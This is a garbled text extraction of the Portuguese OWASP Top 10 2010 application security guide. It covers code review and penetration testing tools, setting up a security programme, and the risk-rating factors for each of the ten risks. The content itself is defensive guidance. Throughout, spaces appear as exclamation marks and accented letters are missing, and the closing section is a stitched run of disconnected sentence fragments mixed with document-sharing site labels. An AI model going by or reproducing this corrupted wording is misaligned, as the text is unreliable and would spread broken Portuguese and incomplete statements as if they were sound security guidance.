presta!aos!especialistas!na!realizao!de!anlises!de!cdigo!fonte,!no!entanto!estas!ferramentas!ainda!esto!
apenas!na!sua!fase!inicial!de!desenvolvimento.!Os!autores!destas!ferramentas!usamhnas!diariamente!quando!
realizam!revises!de!cdigo!de!segurana,!mas!para!nohespecialistas!estas!ferramentas!so!ainda!muito!
diceis!de!utilizar.!Entre!estas!ferramentas!incluihse!o!CodeCrawler,!o!Orizon!e!a!O2.
Testes!de!Segurana!e!de!Penetrao
Testes!Aplicacionais:!A!OWASP!produziu!o!Guia!de!Testes!para!ajudar!os!programadores,!os!responsveis!
de!testes!e!os!especialistas!em!segurana!aplicacional!a!perceberem!como!testar!a!segurana!das!aplicaes !
web!de!uma!forma!eicaz!e!eiciente.!Este!enorme!guia,!que!recebeu!contribuies!de!inmeros!especialistas, !
oferece!uma!cobertura!vasta!de!muitos!dos!assuntos!que!esto!relacionados!com!os!testes!de!segurana!em!
aplicaes!web.!Da!mesma!forma!que!a!reviso!do!cdigo!fonte!tem!os!seus!pontos!fortes,!o!mesmo!acontece!
com!estes!testes!de!segurana.!Impressiona!muito!mais!quando!se!pode!provar!que!uma!aplicao!!insegura!
atravs!da!demonstrao!da!explorao!da!mesma.!Existem!igualmente!muitos!aspetos!de!segurana,!em!
particular!toda!a!segurana!oferecida!pela!infraestrutura!aplicacional,!que!no!pode!ser!simplesmente!vista!
atravs!de!revises!do!cdigo!fonte,!uma!vez!que!a!aplicao!no!oferece!a!sua!prpria!segurana.
Ferramentas!de!Testes!de!Penetrao!Aplicacional:!a!WebScarab,!que!!um!dos!projetos!mais!utilizados!
da!OWASP,!!uma!ferramenta!que!permite!testar!aplicaes!web,!funcionando!como!um!intermedirio!entre!
o ! navegador ! e ! a ! aplicao ! web ! a ! testar. ! Esta ! ferramenta ! permite ! que ! um ! analista ! de ! segurana ! possa!
intercetar!os!pedidos!realizados!!aplicao!web!para!que!este!possa!perceber!como!a!aplicao!funciona.!
Permite!igualmente!que!o! analista!possa!submeter!pedidos! de! teste!e!veriicar! como! !que!a!aplicao !
responde!de!forma!segura!a!esses!mesmos!pedidos.!Esta!ferramenta!!particularmente!eicaz!a!ajudar!um!
analista!de!segurana!a!identiicar!falhas!de!XSS,!falhas!de!Autenticao!e!falhas!no!Controlo!de!Acessos.
O!que!se!segue!para!as!Organizaes?
Inicie!o!seu!Programa!de!Segurana!Aplicacional!agora
A ! segurana ! aplicacional ! j ! no ! ! uma ! escolha. ! Entre ! o ! aumento ! do ! nmero ! de ! ataques ! e ! a ! presso !
reguladora, ! as ! organizaes ! devem ! estabelecer ! uma ! capacidade ! efetiva ! para ! poderem ! tornar ! as ! suas!
aplicaes!mais!seguras.!Devido!ao!elevado!nmero!de!aplicaes!e!de!linhas!de!cdigo!fonte!j!em!produo,!
muitas!organizaes!lutam!para!conseguirem!resolver!o!enorme!volume!de!vulnerabilidades!nas!mesmas.!A!
OWASP!recomenda!que!as!organizaes!estabeleam!um!programa!de!segurana!aplicacional!para!tentarem!
ganhar!o!conhecimento!que!lhes!permita!melhorar!a!segurana!no!conjunto!de!aplicaes!que!utilizam.!
Conseguir!segurana!aplicacional!requer!que!diferentes!partes!da!organizao!tenham!que!trabalhar!em!
conjunto!de!forma!eiciente,!incluindo!a!segurana!e!auditoria,!desenvolvimento!de!software!e!a!gesto!do!
negcio!e!executiva.!Requer!que!a!segurana!seja!visvel,!para!que!os!diferentes!atores!possam!ver!e!perceber!
a!postura!da!organizao!em!relao!!segurana!aplicacional.!Requer!igualmente!um!enfoque!nas!atividades!
e!resultados!que!ajudem!a!segurana!da!organizao!atravs!de!uma!reduo!do!risco!da!forma!mais!efetiva!
possvel.!Algumas!das!atividades!principais!em!programas!efetivos!de!segurana!aplicacional!incluem:
Comear
Abordagem!ao!risco!
baseada!na!Carteira!
de!Aplicaes
Habilitar!com!
fundaes!fortes
Estabelecer!um!programa!de!segurana!aplicacional!e!estimular!a!sua!
adoo
Conduzir ! uma !anlise ! diferencial ! comparando ! a ! organizao ! com!

outras!semelhantes! para!deinir!reas!de!melhorias!e!um!plano!de!
execuo.
Ganhar ! a ! aprovao ! da ! gesto ! e ! estabelecer ! uma !campanha ! de!

sensibilizao!para!toda!a!organizao.
Identiicar!e !estabelecer!prioridades!na!sua!carteira!de!aplicaes! a!
partir!de!uma!perspetiva!de!risco!inerente.
Criar ! um ! aplicativo ! de ! peril ! de ! risco ! do ! modelo ! para ! medir ! e!

estabelecer ! prioridades ! nas ! aplicaes ! da ! sua ! carteira. ! Estabelecer!
diretrizes!de!garantia!para!deinir!corretamente!a!cobertura!e!nvel!de!
rigor!necessrio.
Estabelecer ! um !modelo ! comum ! de ! classiicao ! de ! risco! com ! um!

conjunto!consistente!de!probabilidade!e!fatores!de!impacto!que!relita!
a!tolerncia!da!organizao!para!o!risco.
Estabelecer ! um ! conjunto ! de !polticas ! e ! normas! focalizadas ! que!

proporcionem!uma!base!comum!de!segurana!aplicacional!e!!qual!
todas!as!equipas!de!desenvolvimento!possam!aderir.
Deinir!um !conjunto!comum!de!controlos!de!segurana!reutilizveis!
que!complementem!estas!polticas!e!normas,!oferecendo!orientao!
no!desenho!e!desenvolvimento!durante!a!sua!utilizao.
Estabelecer!um!currculo!de!formao!em!segurana!aplicacional!que!
seja ! necessria ! e ! orientada ! para ! as ! diferentes ! funes ! e ! temas ! de!
desenvolvimento.
Deinir ! e ! integrar ! as ! atividades ! de !implementao! e !veriicao! de!

segurana ! nos ! processos ! operacionais ! e ! de ! desenvolvimento!
existentes. ! Estas ! atividades ! incluem ! a !Modelao ! de ! Ameaas, ! o!
Desenho! e !Reviso! Segura,! Codiicao!e !Reviso! Segura, !Testes! de!
Penetrao,!Remediao,!etc.
Fornecer!especialistas!no!assunto!e !servios!de!apoio!s!equipas!de!
desenvolvimento!para!que!o!projeto!possa!ser!bem!sucedido.
Gerir ! com ! mtricas. ! Conduzir ! ! melhoria ! e ! s ! decises ! de!

inanciamento ! com ! base ! em ! mtricas ! e ! em ! anlises ! dos ! dados!
capturados. ! Mtricas ! incluem ! a ! adeso ! a ! prticas/atividades ! de!
segurana,!vulnerabilidades!introduzidas,!vulnerabilidades!mitigadas,!
grau!de!cobertura!de!aplicao,!etc.
Analisar!os!dados!das!atividades!de!implementao!e!veriicao!para!
procurar ! a ! principal ! causa ! e ! os ! padres ! de ! vulnerabilidades ! para!
impulsionar!a!melhoria!estratgica!e!sistemtica!em!toda!a!empresa.
Integrar!a!
Segurana!em!
processos!existentes
Dar!visibilidade!!
Gesto
Notas!sobre!o!Risco
!sobre!Riscos!e!no!sobre!Vulnerabilidades
Apesar!das!verses!anteriores!do!OWASP!Top!10!estarem!focadas!na!identiicao!das!vulnerabilidades!mais!
comuns, ! estes ! documentos ! sempre ! foram ! organizados ! em ! torno ! dos ! riscos. ! Isto ! causou ! uma ! confuso!
compreensvel!pelas!pessoas!que!procuravam!por!uma!taxonomia!direta!sobre!fraquezas!em!aplicaes!web.!
Esta!nova!verso!clariica!o!foco!nos!riscos!estabelecido!no!Top!10,!sendo!mais!explcita!sobre!como!os!
agentes!de!ameaa,!vetores!de!ataque,!fraquezas,!impactos!tcnicos!e!impactos!de!negcio!so!combinados !
para!produzir!riscos.
Para!conseguir!este!propsito,!foi!desenvolvida!uma!metodologia!de!Estimativa!de!Riscos!para!o!Top!10!
baseada!na!Metodologia!de!Classiicao!de!Riscos!da!OWASP.!Para!cada!item!do!Top!10,!foi!estimado!o!risco!
tpico!que!cada!fragilidade!gera!para!uma!aplicao!web!observando!os!fatores!comuns!de!probabilidade!e!
impacto.!Posteriormente,!ordenmos!o!Top!10!de!acordo!com!estas!fragilidades,!que!tipicamente!introduzem!
a!maior!parte!dos!riscos!signiicativos!numa!aplicao.
A!Metodologia!de!Classiicao!de!Riscos!da!OWASP!deine!diversos!fatores!que!ajudam!no!clculo!de!risco!
de!uma!vulnerabilidade!identiicada.!Entretanto,!o!Top!10!deve!expor!estas!de!uma!forma!genrica!ao!invs!
de!problemas!especicos!em!aplicaes!reais.!Consequentemente,!nunca!poderemos!ser!precisos!como!o!
dono!de!um!sistema!para!calcular!os!riscos!inerentes!s!suas!aplicaes.!Ns!no!sabemos!o!quo!importante!
so!as!suas!aplicaes!e!dados,!quais!so!os!seus!agentes!de!ameaa!e!muito!menos!como!o!seu!sistema!foi !
feito!e!!operado.
Esta!metodologia!inclui!trs!fatores!de!probabilidade!para!cada!fragilidade!(preponderncia,!facilidade!de!
deteo!e!facilidade!de!explorao)!e!um!fator!de!impacto!(impacto!tcnico).!A!preponderncia!de!uma!
fragilidade!!um!fator!que!voc!normalmente!no!tem!que!calcular!pois!inclumos!dados!estatsticos!obtidos!
de!diferentes!organizaes,!cuja!mdia!foi!posteriormente!calculada!em!conjunto!para!produzir!um!Top!10!
de!probabilidades!listadas!de!acordo!com!este!fator.!Estes!dados!foram!ento!combinados!com!os!outros!dois!
fatores!de!probabilidade!facilidade!de!deteo!e!facilidade!de!explorao)!para!calcular!a!taxa!de!ocorrncia !
para!cada! fragilidade.! Os! resultados !foram!ento !multiplicados !pela! nossa!estimativa !mdia! de! impacto!
tcnico!para!cada!item,!resultando!no!posicionamento!geral!de!cada!item!no!Top!10.
De!notar!que!esta!abordagem!no!leva!em!considerao!a!probabilidade!do!agente!de!ameaa.!Nem!tem!em !
considerao!nenhum!dos!vrios!detalhes!tcnicos!associados!!sua!aplicao!em!particular.!Qualquer!um!
destes!fatores!pode!afetar!signiicativamente!a!probabilidade!geral!de!um!atacante!identiicar!e!explorar!uma!
vulnerabilidade!especica.!Esta!classiicao!tambm!no!tem!em!considerao!nenhum!impacto!no!seu !
negcio.!A!sua!organizao!deve!decidir!qual!!o!nvel!de!risco!que!pode!ser!aceitvel!nas!suas!aplicaes.!O!
objetivo!do!Top!10!da!OWASP!no!!o!de!efetuar!esta!anlise!de!riscos!por!si.
A!imagem!abaixo!ilustra!o!clculo!de!risco!para!A2:!CrosshSite!Scripting,!como!um!exemplo.!Note!que!o!XSS! !
to!generalizado!que!!a!nica!vulnerabilidade!da!lista!inteira!classiicada!com!o!valor!"Muito!Generalizada". !
Todas!as!demais!esto!classiicadas!entre!generalizada!e!pouco!comum!(valores!entre!1!e!3).
Detalhes!sobre!os!Fatores!de!Risco
Sumrio!dos!Fatores!de!Risco!do!OWASP!Top!10
A!tabela!a!seguir!apresenta!um!resumo!do!Top!10!dos!Riscos!de!Segurana!Aplicacional!de!2010!e!os!fatores!
de!risco!que!foram!atribudos!a!cada!um!elementos!do!Top!10.!Estes!fatores!foram!determinados!com!base!
em!estatsticas!disponveis!e!na!experincia!da!equipa!da!OWASP.!Para!perceber!esses!riscos!no!contexto!de !
uma ! determinada ! aplicao ! ou ! organizao, !deve ! considerar ! os ! seus ! prprios ! agentes ! de ! ameaa!
especgicos!e!os!impactos!no!seu!negcio.!Mesmo!as!deicincias!de!software!mais!lagrantes!podem!no!
representar!um!srio!risco!se!no!existirem!agentes!de!ameaa!numa!posio!em!que!possam!realizar!o!
ataque!necessrio!ou!o!impacto!nos!negcios!!insigniicante!para!os!ativos!envolvidos.
RISCO
Agente!
de!
Ameaa
Vetor!de!
Ataque
Explorao
Vulnerabilidade!de!Segurana
Prevalncia
Deteo
Impacto!
Tcnico
Impacto
A1!!Injeo
FCIL
COMUM
MDIA
SEVERO
A2!!XSS
MDIA
MUITO!GENERALIZADA
FCIL
MODERADO
A3!!Auth'n
MDIA
COMUM
MDIA
SEVERO
A4!!DOR
FCIL
COMUM
FCIL
MODERADO
A5!W!CSRF
MDIA
GENERALIZADA
FCIL
MODERADO
A6!!Congig
FCIL
COMUM
FCIL
MODERADO
A7!!Crypto
DIFICIL
POUCO!COMUM
FCIL
SEVERO
A8 ! ! URL!
Access
FCIL
POUCO!COMUM
MDIA
MODERADO
A9!!Transport!
DIFICIL
COMUM
FCIL
MODERADO
A10!!Redirects
MDIA
POUCO!COMUM
FCIL
MODERADO
Riscos!Adicionais!a!considerar
Impacto!
de!
Negcio
O!Top!10!consegue!cobrir!um!importante!lote,!mas!existem!outros!riscos!que!devem!ser!considerados!e!
avaliados!pela!sua!organizao.!Alguns!destes!tm!aparecido!em!verses!anteriores!do!Top!10!da!OWASP,!
enquanto!outros!no,!incluindo!novas!tcnicas!de!ataque!que!vo!sendo!identiicadas!ao!longo!do!tempo.!
Outros!riscos!importantes!de!segurana!aplicacional!(listados!por!ordem!alfabtica)!que!devem!igualmente!
ser!considerados!incluem:
!Clickjacking!!(recmhdescoberta!tcnica!de!ataque!em!2008)
Falhas!de!Concorrncia
!Negao!de!Servio!!(era!parte!do!Top!10!de!2004!h!Entrada!A9)
!Perda!de!Informao!!e!Tratamento!
!
!Incorreto
!
!!de!Erros
!
!!(era!parte!do!Top!10!de!2007!h!Entrada!A6)
!Antihautomao!insuiciente!
Registo!e!Responsabilizao!Insuicientes!(relacionado!com!o!Top!10!de!2007!h!Entrada!A6)
!Falta!de!!Deteo
!
!!de!Intruses!e!de!Resposta
!
!
!Execuo!de!Ficheiros!Maliciosos!!(estava!no!Top!10!de!2007!h!Entrada!A3)

OwaspTop10 PTPT v2

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

OwaspTop10 PTPT v2

Enviado por

Direitos autorais:

Formatos disponíveis

Notas!desta!

Todas ! as ! ferramentas ! OWASP, ! documentos, ! fruns, ! e ! as ! delegaes/captulos ! so ! livres ! e ! abertos ! !

A7 ! ! Quebra ! da ! Autenticao ! e ! da ! Gesto ! de!

A3 ! ! Quebra ! da ! Autenticao ! e ! da ! Gesto ! de!

A10 ! h ! Redirecionamentos ! e ! Encaminhamentos!

A ! segurana ! depende ! tambm ! da ! existncia ! de ! coniguraes ! seguras!

Muitas ! aplicaes ! web ! no ! protegem ! devidamente ! dados ! sensveis ! tais ! como!

Muitas ! aplicaes ! web ! veriicam ! os ! direitos ! de ! acesso ! a ! um ! URL ! antes ! de!

As ! aplicaes ! falham ! frequentemente ! na ! autenticao, ! cifra, ! e ! proteo ! da!

O! atacante! pode!simplesmente!alterar ! o ! parmetro ! 'acct'! no ! seu ! navegador ! para!enviar ! qualquer ! outra!

!ESAPI ! Access ! Control ! API!!

(ver ! isAuthorizedForData(), ! isAuthorizedForFile(),!

O !CSRF! tira ! proveito ! de!

A!forma! mais!fcil! para! veriicar!se! uma!aplicao!! vulnervel!! veriicar!se! cada!ligao!e! formulrio !

Este ! tipo ! de!

componentes ! externas ! ao ! cdigo ! da ! aplicao. ! Independentemente ! do(s) ! mecanismo(s) ! fazemhse ! as!

Ao ! invs ! de ! tentar ! encaixar ! a ! segurana ! nas ! suas ! aplicaes ! ! muito ! mais!

Conduzir ! uma !anlise ! diferencial ! comparando ! a ! organizao ! com!

Ganhar ! a ! aprovao ! da ! gesto ! e ! estabelecer ! uma !campanha ! de!

Criar ! um ! aplicativo ! de ! peril ! de ! risco ! do ! modelo ! para ! medir ! e!

Estabelecer ! um !modelo ! comum ! de ! classiicao ! de ! risco! com ! um!

Estabelecer ! um ! conjunto ! de !polticas ! e ! normas! focalizadas ! que!

Deinir ! e ! integrar ! as ! atividades ! de !implementao! e !veriicao! de!

Gerir ! com ! mtricas. ! Conduzir ! ! melhoria ! e ! s ! decises ! de!

Você também pode gostar